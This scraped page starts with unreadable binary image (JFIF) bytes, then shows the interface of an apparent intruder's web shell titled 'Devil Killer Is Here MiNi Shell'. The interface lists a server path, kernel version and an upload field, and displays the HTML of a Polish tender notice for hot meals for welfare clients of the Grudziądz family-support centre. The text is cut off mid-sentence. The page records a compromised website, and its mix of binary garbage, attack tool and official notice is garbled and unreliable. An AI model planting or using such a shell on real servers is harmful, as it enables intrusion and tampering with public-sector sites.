JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231122/0050450201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przygotowywania i wydawania gorących posiłków podopiecznym Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu w okresie od dnia <br/>1 stycznia 2024 r. do dnia 31 grudnia 2024 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Rodzinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 005742433</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Waryńskiego 34A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grudziądz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566968700</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">566968702</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@mopr.grudziadz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mopr.grudziadz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przygotowywania i wydawania gorących posiłków podopiecznym Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu w okresie od dnia <br/>1 stycznia 2024 r. do dnia 31 grudnia 2024 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-76e6afe0-8907-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00504502</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00030021/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przygotowywanie i wydawanie gorących posiłków podopiecznym Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gpp_grudziadz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gpp_grudziadz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający informuje, że instrukcje korzystania z platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem https://platformazakupowa.pl/strona/45-instrukcje.<br/>Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej opisane zostały w regulaminie platformazakupowa.pl, https://platformazakupowa.pl/strona/1-regulamin.<br/>Zamawiający określa minimalne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format<br/>plików .pdf,<br/>f) platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar,<br/>h) maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>Wykonawca, przystępując do niniejszego postępowania:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do instrukcji składania ofert dostępne pod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view.<br/>Ofertę, oświadczenia oraz podmiotowe środki dowodowe składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanego dalej „RODO”, informujemy, że:<br/>1) Administratorem danych osobowych Wykonawcy jest Zamawiający: Miejski Ośrodek Pomocy Rodzinie ul. Waryńskiego 34A, 86-300 Grudziądz, tel. 56 69 68 700, faks 56 69 68 702, e-mail: poczta@mopr.grudziadz.pl;<br/>2) Inspektorem ochrony danych osobowych w Miejskim Ośrodku Pomocy Rodzinie w Grudziądzu jest Pan Sebastian Drzymalski, e-mail: iod@mopr.grudziadz.pl;<br/>3) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO oraz art. 275 pkt 1 ustawy Pzp w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Usługa przygotowywania i wydawania gorących posiłków podopiecznym Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu w okresie od dnia 1 stycznia 2024 r. do dnia 31 grudnia 2024 r. w lokalu gastronomicznym na podstawie wystawionych przez MOPR decyzji administracyjnych przyznających posiłki osobom uprawnionym do ich otrzymania” prowadzonym w trybie podstawowym; <br/>4) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5) dane osobowe Wykonawcy będą przechowywane przez okres 5 lat kalendarzowych, a umowa zawarta w wyniku postępowania przez okres 10 lat, licząc od dnia pierwszego stycznia roku następnego od daty zakończenia postępowania o udzielenie zamówienia;<br/>6) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio jego dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>7) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) Wykonawca posiada na podstawie RODO:<br/> a) prawo dostępu do swoich danych osobowych; <br/> b) prawo do sprostowania swoich danych osobowych*;<br/> c) prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jego dotyczących narusza przepisy RODO;<br/>9) dane osobowe nie będą przekazywane do państw trzecich.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.251.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2394000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przygotowywania i wydawania gorących posiłków podopiecznym Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu,<br/>w okresie od dnia 1 stycznia 2024 r. do dnia 31 grudnia 2024 r. w lokalu gastronomicznym w obrębie Starego Miasta, Śródmieścia i Tarpna w Grudziądzu – przewidywana ilość posiłków to około 300 obiadów dziennie, na podstawie<br/>wystawionych przez MOPR decyzji administracyjnych przyznających posiłki osobom uprawnionym do ich otrzymania w dni robocze, tj. od poniedziałku<br/>do piątku z wyłączeniem dni świątecznych wolnych od pracy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1260000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze złożonej oferty będzie się kierować<br/>następującymi kryteriami:<br/>1) cena brutto oferty – 60 %<br/>Maksymalną liczbę punktów, tj. 60 punktów uzyska oferta z najniższą ceną wskazaną w formularzu ofertowym. Pozostałe oferty uzyskają proporcjonalnie mniej punktów.<br/>Punkty zostaną obliczone wg następującego wzoru:<br/>Cena jednego posiłku (C) = Cmin/ Cbad x 60 pkt<br/><br/>gdzie:<br/>C – liczba punktów przyznanych Wykonawcy za cenę jednego posiłku,<br/>Cmin – najniższa zaoferowana cena brutto za jeden posiłek,<br/>Cbad – cena brutto jednego posiłku zaoferowana w badanej ofercie.<br/><br/>2) doświadczenie zawodowe osoby wskazanej przez Wykonawcę na stanowisko kucharza – 20 %<br/>Maksymalną liczbę punktów, tj. 20 punktów uzyska oferta, w której osoba wskazana przez Wykonawcę na stanowisko kucharza<br/>posiada doświadczenie w zawodzie kucharza wynoszące powyżej 2 lat.<br/>Punkty zostaną obliczone wg następującego wzoru:<br/>Doświadczenie kucharza (D) = Dbad/Dmax x 20 pkt<br/><br/>gdzie:<br/>D – liczba punktów przyznanych Wykonawcy w kryterium doświadczenie<br/>kucharza,<br/>Dbad – liczba punktów przyznana Wykonawcy w kryterium doświadczenie kucharza<br/>Dmax – najwyższa liczba punktów możliwa do uzyskania w kryterium doświadczenie kucharza.<br/><br/>W ramach kryterium doświadczenia zawodowego osoby wskazanej przez<br/>Wykonawcę na stanowisko kucharza Zamawiający zastosuje następujące<br/>zasady przydziału punktów:<br/>- za doświadczenie zawodowe 1 rok oferta otrzyma 0 punktów,<br/>- za doświadczenie zawodowe powyżej 1 roku do 2 lat oferta otrzyma 10 punktów,<br/>- za doświadczenie zawodowe powyżej 2 lat oferta otrzyma 20 punktów.<br/><br/>3) niepowtarzalność zaoferowanych posiłków – 20 %<br/>Maksymalną liczbę punktów, tj. 20 punktów uzyska oferta, w której Wykonawca zadeklaruje, że składnik główny drugiego dania, tj.<br/>mięso, ryba, podroby, itp. przyrządzony w takiej samej formie/w taki sam sposób nie będzie powtarzał się przez okres minimum 16<br/>dni. Punkty zostaną obliczone wg następującego wzoru:<br/>Niepowtarzalność posiłków (N) = Nbad/Nmax x 20 pkt<br/><br/>gdzie:<br/>N – liczba punktów przyznanych Wykonawcy w kryterium niepowtarzalność<br/>zaoferowanych posiłków,<br/>Nbad – liczba punktów przyznana Wykonawcy w kryterium niepowtarzalność<br/>zaoferowanych posiłków,<br/>Nmax – najwyższa liczba punktów możliwa do uzyskania w kryterium<br/>niepowtarzalność zaoferowanych posiłków.<br/><br/>W ramach kryterium niepowtarzalność zaoferowanych posiłków <br/>Zamawiający zastosuje następujące zasady przydziału punktów:<br/>- za zadeklarowanie przez Wykonawcę niepowtarzalności posiłków przez 10 dni oferta otrzyma 0 punktów,<br/>- za zadeklarowanie przez Wykonawcę niepowtarzalności posiłków od 11 do 15 dni oferta otrzyma 10 punktów,<br/>- za zadeklarowanie przez Wykonawcę niepowtarzalności posiłków powyżej 15 dni oferta otrzyma 20 punktów.<br/><br/>4) Zamawiający wyliczy łączną ocenę punktową badanej oferty na podstawie<br/>poniższego wzoru uwzględniającego kryteria:<br/>P = C + D + N<br/><br/>gdzie:<br/>P – całkowita liczba punktów badanej oferty,<br/>C – liczba punktów przyznanych Wykonawcy w kryterium cena,<br/>D – liczba punktów przyznanych Wykonawcy w kryterium doświadczenie kucharza,<br/>N – liczba punktów przyznanych Wykonawcy w kryterium niepowtarzalność posiłków.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kucharza</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Niepowtarzalność posiłków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przygotowywania i wydawania gorących posiłków podopiecznym Miejskiego Ośrodka Pomocy Rodzinie w Grudziądzu,<br/>w okresie od dnia 1 stycznia 2024 r. do dnia 31 grudnia 2024 r. w lokalu gastronomicznym w obrębie osiedli: Kopernika, Kawalerii Polskiej, Strzemięcina, Rządza i Mniszka w Grudziądzu – przewidywana ilość<br/>posiłków to około 270 obiadów dziennie, na podstawie wystawionych przez MOPR decyzji administracyjnych przyznających posiłki osobom uprawnionym do ich otrzymania w dni robocze, tj. od poniedziałku do piątku z wyłączeniem dni świątecznych wolnych od pracy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1134000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55322000-3 - Usługi gotowania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze złożonej oferty będzie się kierować<br/>następującymi kryteriami:<br/>1) cena brutto oferty – 60 %<br/>Maksymalną liczbę punktów, tj. 60 punktów uzyska oferta z najniższą ceną wskazaną w formularzu ofertowym. Pozostałe oferty uzyskają proporcjonalnie mniej punktów.<br/>Punkty zostaną obliczone wg następującego wzoru:<br/>Cena jednego posiłku (C) = Cmin/ Cbad x 60 pkt<br/><br/>gdzie:<br/>C – liczba punktów przyznanych Wykonawcy za cenę jednego posiłku,<br/>Cmin – najniższa zaoferowana cena brutto za jeden posiłek,<br/>Cbad – cena brutto jednego posiłku zaoferowana w badanej ofercie.<br/><br/>2) doświadczenie zawodowe osoby wskazanej przez Wykonawcę na stanowisko kucharza – 20 %<br/>Maksymalną liczbę punktów, tj. 20 punktów uzyska oferta, w której osoba wskazana przez Wykonawcę na stanowisko kucharza<br/>posiada doświadczenie w zawodzie kucharza wynoszące powyżej 2 lat.<br/>Punkty zostaną obliczone wg następującego wzoru:<br/>Doświadczenie kucharza (D) = Dbad/Dmax x 20 pkt<br/><br/>gdzie:<br/>D – liczba punktów przyznanych Wykonawcy w kryterium doświadczenie<br/>kucharza,<br/>Dbad – liczba punktów przyznana Wykonawcy w kryterium doświadczenie kucharza<br/>Dmax – najwyższa liczba punktów możliwa do uzyskania w kryterium doświadczenie kucharza.<br/><br/>W ramach kryterium doświadczenia zawodowego osoby wskazanej przez<br/>Wykonawcę na stanowisko kucharza Zamawiający zastosuje następujące<br/>zasady przydziału punktów:<br/>- za doświadczenie zawodowe 1 rok oferta otrzyma 0 punktów,<br/>- za doświadczenie zawodowe powyżej 1 roku do 2 lat oferta otrzyma 10 punktów,<br/>- za doświadczenie zawodowe powyżej 2 lat oferta otrzyma 20 punktów.<br/><br/>3) niepowtarzalność zaoferowanych posiłków – 20 %<br/>Maksymalną liczbę punktów, tj. 20 punktów uzyska oferta, w której Wykonawca zadeklaruje, że składnik główny drugiego dania, tj.<br/>mięso, ryba, podroby, itp. przyrządzony w takiej samej formie/w taki sam sposób nie będzie powtarzał się przez okres minimum 16<br/>dni. Punkty zostaną obliczone wg następującego wzoru:<br/>Niepowtarzalność posiłków (N) = Nbad/Nmax x 20 pkt<br/><br/>gdzie:<br/>N – liczba punktów przyznanych Wykonawcy w kryterium niepowtarzalność<br/>zaoferowanych posiłków,<br/>Nbad – liczba punktów przyznana Wykonawcy w kryterium niepowtarzalność<br/>zaoferowanych posiłków,<br/>Nmax – najwyższa liczba punktów możliwa do uzyskania w kryterium<br/>niepowtarzalność zaoferowanych posiłków.<br/><br/>W ramach kryterium niepowtarzalność zaoferowanych posiłków <br/>Zamawiający zastosuje następujące zasady przydziału punktów:<br/>- za zadeklarowanie przez Wykonawcę niepowtarzalności posiłków przez 10 dni oferta otrzyma 0 punktów,<br/>- za zadeklarowanie przez Wykonawcę niepowtarzalności posiłków od 11 do 15 dni oferta otrzyma 10 punktów,<br/>- za zadeklarowanie przez Wykonawcę niepowtarzalności posiłków powyżej 15 dni oferta otrzyma 20 punktów.<br/><br/>4) Zamawiający wyliczy łączną ocenę punktową badanej oferty na podstawie<br/>poniższego wzoru uwzględniającego kryteria:<br/>P = C + D + N<br/><br/>gdzie:<br/>P – całkowita liczba punktów badanej oferty,<br/>C – liczba punktów przyznanych Wykonawcy w kryterium cena,<br/>D – liczba punktów przyznanych Wykonawcy w kryterium doświadczenie kucharza,<br/>N – liczba punktów przyznanych Wykonawcy w kryterium niepowtarzalność posiłków.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi 